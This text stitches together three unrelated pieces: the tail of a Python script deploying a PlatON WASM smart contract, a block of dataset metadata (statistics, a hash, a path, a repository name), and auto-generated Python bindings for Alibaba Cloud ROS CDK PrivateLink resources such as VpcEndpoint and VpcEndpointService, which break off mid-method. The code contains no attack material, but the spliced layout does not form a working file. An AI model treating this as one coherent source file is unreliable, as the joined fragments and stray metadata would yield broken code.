abi=[{"constant":false,"input":[{"name":"input","type":"uint64"}],"name":"set","output":"void","type":"Action"},{"constant":false,"input":[],"name":"init","output":"void","type":"Action"},{"constant":true,"input":[],"name":"get","output":"uint64","type":"Action"}]
print(type(abi))
# Instantiate and deploy contract
Payable = platon.wasmcontract(abi=abi, bytecode=bytecode,vmtype=1)
tx_hash = Payable.constructor().transact(
{
'from':from_address,
'gas':1500000,
}
)
# Wait for the transaction to be mined, and get the transaction receipt
tx_receipt = platon.waitForTransactionReceipt(tx_hash)
print(tx_receipt)
# Create the contract instance with the newly-deployed address
payable = platon.wasmcontract(address=tx_receipt.contractAddress, abi=abi,vmtype=1)
tx_hash1 = payable.functions.set(10).transact(
{
'from':from_address,
'gas':1500000,
}
)
# Wait for the transaction to be mined, and get the transaction receipt
tx_receipt = platon.waitForTransactionReceipt(tx_hash1)
print(tx_receipt)
# hrpgot, data = bech32.decode("lax", from_address)
# address = to_checksum_address(bytes(data))
# print(address)
address = "lax1yjjzvjph3tw4h2quw6mse25y492xy7fzwdtqja"
# # Display the default greeting from the contract
print('get : {}'.format(
payable.functions.get().call()
))
| 564.851351
| 26,735
| 0.979736
| 348
| 41,799
| 117.58046
| 0.353448
| 0.00154
| 0.0022
| 0.002151
| 0.013466
| 0.013466
| 0.012708
| 0.012513
| 0.010998
| 0.008847
| 0
| 0.854598
| 0.006364
| 41,799
| 74
| 26,736
| 564.851351
| 0.130595
| 0.686763
| 0
| 0.166667
| 0
| 0
| 0.920416
| 0.906336
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0.166667
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d75b5508ec480c28503bcacb56ebe36b393f0827
| 70,197
|
py
|
Python
|
multiple-languages/python/ros-cdk-privatelink-1.0.4/src/ros_cdk_privatelink/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
multiple-languages/python/ros-cdk-privatelink-1.0.4/src/ros_cdk_privatelink/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
multiple-languages/python/ros-cdk-privatelink-1.0.4/src/ros_cdk_privatelink/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
'''
## Aliyun ROS PRIVATELINK Construct Library
This module is part of the AliCloud ROS Cloud Development Kit (ROS CDK) project.
```python
import * as PRIVATELINK from '@alicloud/ros-cdk-privatelink';
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import ros_cdk_core
class RosVpcEndpoint(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpoint",
):
'''A ROS template type: ``ALIYUN::PrivateLink::VpcEndpoint``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosVpcEndpointProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpoint``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrBandwidth")
def attr_bandwidth(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: Bandwidth: The bandwidth of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointDomain")
def attr_endpoint_domain(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: EndpointDomain: The domain name of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointId")
def attr_endpoint_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: EndpointId: The ID of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointName")
def attr_endpoint_name(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: EndpointName: The name of the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceId: The ID of endpoint service that is associated with the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceName: The name of endpoint service that is associated with the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrVpcId")
def attr_vpc_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: VpcId: The vpc ID of endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrVpcId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrZoneDomains")
def attr_zone_domains(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ZoneDomains: The zone domains.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrZoneDomains"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="securityGroupId")
def security_group_id(
self,
) -> typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]:
'''
:Property: securityGroupId: The security group associated with the endpoint network interface. The security group can control the data communication from the VPC to the endpoint network interface.
'''
return typing.cast(typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]], jsii.get(self, "securityGroupId"))
@security_group_id.setter
def security_group_id(
self,
value: typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]],
) -> None:
jsii.set(self, "securityGroupId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcId")
def vpc_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: vpcId: The VPC to which the endpoint belongs.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "vpcId"))
@vpc_id.setter
def vpc_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "vpcId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="endpointDescription")
def endpoint_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointDescription: The description of the endpoint.
The description must be 2 to 256 characters in length and cannot start with http:// or https://.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "endpointDescription"))
@endpoint_description.setter
def endpoint_description(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "endpointDescription", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="endpointName")
def endpoint_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointName: The name of the endpoint.
The name must be 2 to 128 characters in length and can contain digits, underscores
(_), and hyphens (-). The name must start with a letter.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "endpointName"))
@endpoint_name.setter
def endpoint_name(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "endpointName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceId")
def service_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "serviceId"))
@service_id.setter
def service_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "serviceId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceName")
def service_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceName: The name of the endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "serviceName"))
@service_name.setter
def service_name(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "serviceName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zone")
def zone(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpoint.ZoneProperty"]]]]:
'''
:Property: zone:
'''
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpoint.ZoneProperty"]]]], jsii.get(self, "zone"))
@zone.setter
def zone(
self,
value: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpoint.ZoneProperty"]]]],
) -> None:
jsii.set(self, "zone", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpoint.ZoneProperty",
jsii_struct_bases=[],
name_mapping={"v_switch_id": "vSwitchId", "zone_id": "zoneId"},
)
class ZoneProperty:
def __init__(
self,
*,
v_switch_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
zone_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
'''
:param v_switch_id:
:param zone_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"v_switch_id": v_switch_id,
"zone_id": zone_id,
}
@builtins.property
def v_switch_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: vSwitchId: The switch of the endpoint network interface in the given zone.
'''
result = self._values.get("v_switch_id")
assert result is not None, "Required property 'v_switch_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def zone_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: zoneId: The zone of the associated endpoint service.
'''
result = self._values.get("zone_id")
assert result is not None, "Required property 'zone_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ZoneProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointProps",
jsii_struct_bases=[],
name_mapping={
"security_group_id": "securityGroupId",
"vpc_id": "vpcId",
"endpoint_description": "endpointDescription",
"endpoint_name": "endpointName",
"service_id": "serviceId",
"service_name": "serviceName",
"zone": "zone",
},
)
class RosVpcEndpointProps:
def __init__(
self,
*,
security_group_id: typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]],
vpc_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
endpoint_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
endpoint_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
zone: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::PrivateLink::VpcEndpoint``.
:param security_group_id:
:param vpc_id:
:param endpoint_description:
:param endpoint_name:
:param service_id:
:param service_name:
:param zone:
'''
self._values: typing.Dict[str, typing.Any] = {
"security_group_id": security_group_id,
"vpc_id": vpc_id,
}
if endpoint_description is not None:
self._values["endpoint_description"] = endpoint_description
if endpoint_name is not None:
self._values["endpoint_name"] = endpoint_name
if service_id is not None:
self._values["service_id"] = service_id
if service_name is not None:
self._values["service_name"] = service_name
if zone is not None:
self._values["zone"] = zone
@builtins.property
def security_group_id(
self,
) -> typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]:
'''
:Property: securityGroupId: The security group associated with the endpoint network interface. The security group can control the data communication from the VPC to the endpoint network interface.
'''
result = self._values.get("security_group_id")
assert result is not None, "Required property 'security_group_id' is missing"
return typing.cast(typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]], result)
@builtins.property
def vpc_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: vpcId: The VPC to which the endpoint belongs.
'''
result = self._values.get("vpc_id")
assert result is not None, "Required property 'vpc_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def endpoint_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointDescription: The description of the endpoint.
The description must be 2 to 256 characters in length and cannot start with http:// or https://.
'''
result = self._values.get("endpoint_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def endpoint_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
endpointName: The name of the endpoint.
The name must be 2 to 128 characters in length and can contain digits, underscores
(_), and hyphens (-). The name must start with a letter.
'''
result = self._values.get("endpoint_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceName: The name of the endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def zone(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]]:
'''
:Property: zone:
'''
result = self._values.get("zone")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosVpcEndpointProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RosVpcEndpointService(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointService",
):
'''A ROS template type: ``ALIYUN::PrivateLink::VpcEndpointService``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosVpcEndpointServiceProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointService``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMaxBandwidth")
def attr_max_bandwidth(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: MaxBandwidth: The maximum bandwidth of the endpoint connection.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMaxBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMinBandwidth")
def attr_min_bandwidth(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: MinBandwidth: The minimum bandwidth of the endpoint connection.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMinBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDescription")
def attr_service_description(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceDescription: The description of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDescription"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDomain")
def attr_service_domain(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceDomain: The domain name of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceId: The ID of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceName: The name of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="autoAcceptEnabled")
def auto_accept_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests. Valid values:
true: automatically accepts endpoint connection requests.
false: does not automatically accept endpoint connection requests.
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], jsii.get(self, "autoAcceptEnabled"))
@auto_accept_enabled.setter
def auto_accept_enabled(
self,
value: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "autoAcceptEnabled", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="connectBandwidth")
def connect_bandwidth(
self,
) -> typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]]:
'''
:Property: connectBandwidth: The default maximum bandwidth of the endpoint connection. Valid values: 100 to 1024. Unit: Mbit/s.
'''
return typing.cast(typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]], jsii.get(self, "connectBandwidth"))
@connect_bandwidth.setter
def connect_bandwidth(
self,
value: typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "connectBandwidth", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="payer")
def payer(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
payer: The payer of the endpoint service. Valid values:
Endpoint: the service consumer.
EndpointService: the service provider.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "payer"))
@payer.setter
def payer(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "payer", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resource")
def resource(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpointService.ResourceProperty"]]]]:
'''
:Property: resource:
'''
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpointService.ResourceProperty"]]]], jsii.get(self, "resource"))
@resource.setter
def resource(
self,
value: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpointService.ResourceProperty"]]]],
) -> None:
jsii.set(self, "resource", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceDescription")
def service_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceDescription: The description for the endpoint service.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "serviceDescription"))
@service_description.setter
def service_description(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "serviceDescription", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="user")
def user(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]]:
'''
:Property: user: Account IDs to the whitelist of an endpoint service.
'''
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]], jsii.get(self, "user"))
@user.setter
def user(
self,
value: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]],
) -> None:
jsii.set(self, "user", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneAffinityEnabled")
def zone_affinity_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone.
true: yes.
false (default): no
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], jsii.get(self, "zoneAffinityEnabled"))
@zone_affinity_enabled.setter
def zone_affinity_enabled(
self,
value: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "zoneAffinityEnabled", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointService.ResourceProperty",
jsii_struct_bases=[],
name_mapping={
"resource_id": "resourceId",
"resource_type": "resourceType",
"zone_id": "zoneId",
},
)
class ResourceProperty:
def __init__(
self,
*,
resource_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
resource_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
zone_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
'''
:param resource_id:
:param resource_type:
:param zone_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"resource_id": resource_id,
"resource_type": resource_type,
"zone_id": zone_id,
}
@builtins.property
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceId: Service resources added to the endpoint service.
'''
result = self._values.get("resource_id")
assert result is not None, "Required property 'resource_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property:
resourceType: The type of service resource. Set the value to slb (SLB instances that support PrivateLink and are deployed in a VPC).
Note Only Server Load Balancer (SLB) instances that support PrivateLink can serve as service
resources for endpoint services.
'''
result = self._values.get("resource_type")
assert result is not None, "Required property 'resource_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def zone_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: zoneId: The zone to which the service resource belongs.
'''
result = self._values.get("zone_id")
assert result is not None, "Required property 'zone_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ResourceProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RosVpcEndpointServiceAttachment(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointServiceAttachment",
):
'''A ROS template type: ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosVpcEndpointServiceAttachmentProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceId")
def attr_resource_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ResourceId: The resource id.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceType")
def attr_resource_type(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ResourceType: The resource type.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceType"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceId: The endpoint service that is associated with the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
